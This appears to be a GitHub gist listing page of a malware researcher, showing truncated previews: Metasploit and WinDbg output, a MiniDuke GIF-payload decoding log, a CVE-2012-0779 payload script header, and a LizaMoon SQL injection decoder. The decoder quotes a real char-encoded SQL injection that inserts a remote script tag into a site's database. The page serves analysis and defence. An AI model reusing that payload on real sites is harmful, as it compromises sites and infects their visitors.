Skip to content

Instantly share code, notes, and snippets.

Keybase proof

I hereby claim:

  • I am binjo on github.
  • I am binjo (https://keybase.io/binjo) on keybase.
  • I have a public key whose fingerprint is E7D7 173A 359D 531A 58F8 CD86 C92C F9E8 4E2C A2E1

To claim this, I am signing this object:

Using packetfu (1.1.9)
Installing rb-readline (0.5.1)
Using robots (0.10.1)
Using sqlite3 (1.3.9)
Using metasploit-framework (4.10.1.pre.dev) from source at .
Using method_source (0.8.2)
Using network_interface (0.0.1)
Using pcaprub (0.11.3)
Using slop (3.6.0)
Using win32console (1.3.2)
λ ruby msfconsole
[*] Starting the Metasploit Framework console...C:/repos/metasploit-framework/lib/msf/core/modules/loader/directory.rb:109:in `read': Interrupt
from C:/repos/metasploit-framework/lib/msf/core/modules/loader/directory.rb:109:in `block in read_module_content'
from C:/repos/metasploit-framework/lib/msf/core/modules/loader/directory.rb:104:in `open'
from C:/repos/metasploit-framework/lib/msf/core/modules/loader/directory.rb:104:in `read_module_content'
from C:/repos/metasploit-framework/lib/msf/core/modules/loader/base.rb:136:in `load_module'
from C:/repos/metasploit-framework/lib/msf/core/modules/loader/base.rb:272:in `block in load_modules'
from C:/repos/metasploit-framework/lib/msf/core/modules/loader/directory.rb:63:in `block (2 levels) in each_module_reference_name'
from C:/repos/metasploit-framework/lib/rex/file.rb:127:in `block in find'
from C:/repos/metasploit-framework/lib/rex/file.rb:126:in `catch'
<!DOCTYPE HTML>
<html>
<script>
function t()
{
var s="\n";
var elements=new Array("a","abbr","acronym","address","applet","area","article","aside","audio","b","base","basefont","bdi","bdo","big","blockquote","body","br","button","canvas","caption","center","cite","code","col","colgroup","command","datalist","dd","del","details","dfn","dir","div","dl","dt","em","embed","fieldset","figcaption","figure","font","footer","form","frame","frameset","h1","h2","h6","head","header","hgroup","hr","html","i","iframe","img","input","ins","kbd","keygen","label","layer","legend","li","link","listing","main","map","mark","marquee","menu","meta","meter","nav","nobr","noembed","noframes","nolayer","noscript","object","ol","optgroup","option","output","p","param","plaintext","pre","progress","q","rp","ruby","rt","s","samp","script","section","select","small","source","span","strike","strong","style","sub","summary","sup","table","tbody","td","textarea","tfoot","th","thead","title","tr","track","tt","u","ul","v
Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86
Copyright (c) Microsoft Corporation. All rights reserved.
*** wait with pending attach
Symbol search path is: SRV*browser_symbols*http://msdl.microsoft.com/download/symbols;c:\symbols;srv*c:\symbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00130000 001ec000 C:\Program Files\Internet Explorer\iexplore.exe
ModLoad: 69c50000 69d20000 C:\Program Files\Common Files\Microsoft Shared\VGX\vgx.dll
eax=007dbc00 ebx=00000001 ecx=00790000 edx=00790000 esi=00000001 edi=00000001
@binjo
binjo / gist:5049131
Last active December 14, 2015 07:18
[+] decoding {Z:\todo\miniduke\artas\bg_afvd.gif}
[+] finding keys within specific range...
[+] found possible key array...0x27, 0x76, 0x6f, 0xfa, 0xaf, 0xf8, 0x84, 0x42
[+] found MZ @ offset: 0x000006a4
done, check out bg_afvd.gif.dec
[+] decoding {Z:\todo\miniduke\artas\bg_dafd.gif}
[+] finding keys within specific range...
[+] found possible key array...0xaf, 0xfd, 0xd9, 0x9f, 0xf1, 0x10, 0x7, 0x7a
[+] found MZ @ offset: 0x000006a4
done, check out bg_dafd.gif.dec
@binjo
binjo / gen_info.py
Created May 8, 2012 03:52
aio for cve-2012-0779's payload
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
gen_info.py
TODO
"""
__author__ = 'Binjo'
__version__ = '0.1'
@binjo
binjo / decode_lizamoon.py
Created April 7, 2011 01:50
decode log of lizamoon mass sqli attack
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
decode_lizamoon.py
"2011-04-02 00:33:05","194.28.44.190","xxx.xxx.xxx.xxx","GET","http","xxx.xxx.xxx.xxx/en_publications_details.aspx?infoid=fd8c9e72-dfcb-4fdc-aad4-d524339bf6071'+update+tConferenceInfo+set+strDescription=REPLACE(cast(strDescription+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(116)%2Bchar(97)%2Bchar(100)%2Bchar(121)%2Bchar(103)%2Bchar(117)%2Bchar(115)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--","SQL Inject